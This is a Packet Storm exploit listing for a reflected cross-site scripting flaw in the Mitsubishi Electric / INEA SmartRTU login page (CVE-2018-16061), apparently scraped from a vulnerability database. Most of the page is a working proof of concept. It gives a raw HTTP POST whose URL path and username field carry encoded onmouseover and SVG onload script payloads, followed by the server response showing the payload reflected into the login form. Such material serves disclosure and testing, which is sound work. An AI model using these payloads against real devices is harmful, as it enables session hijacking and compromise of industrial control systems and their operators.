Lucene search

K
packetstormHamit CIBOPACKETSTORM:164537
HistoryOct 18, 2021 - 12:00 a.m.

Mitsubishi Electric / INEA SmartRTU Cross Site Scripting

2021-10-1800:00:00
Hamit CIBO
packetstormsecurity.com
248

0.001 Low

EPSS

Percentile

30.8%

`# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)  
# Date: 2021-17-10  
# Exploit Author: Hamit CÄ°BO  
# Vendor Homepage: https://www.inea.si  
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/  
# Version: ME RTU  
# Tested on: Windows  
# CVE : CVE-2018-16061  
  
  
# PoC  
# Request  
  
POST  
/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%  
3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1  
Host: **.**.**.***  
Content-Length: 132  
Cache-Control: max-age=0  
Origin: http://**.**.**.***  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/68.0.3440.84  
Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://**.**.**.***sss/login.php  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7  
Connection: close  
  
submitted=1&username=--  
%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw  
ord=&Submit=Login  
  
# Response  
  
HTTP/1.1 200 OK  
Date: Wed, 08 Aug 2018 08:14:25 GMT  
Server: Apache/2.4.7 (Ubuntu)  
X-Powered-By: PHP/5.5.9-1ubuntu4  
Vary: Accept-Encoding  
Content-Length: 3573  
Connection: close  
Content-Type: text/html  
  
<div id='fg_membersite' class='login_form'>  
<form id='login' name='login'  
action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'  
method='post' accept-charset='UTF-8'>  
  
  
Reference :  
  
https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view  
`

0.001 Low

EPSS

Percentile

30.8%

Related for PACKETSTORM:164537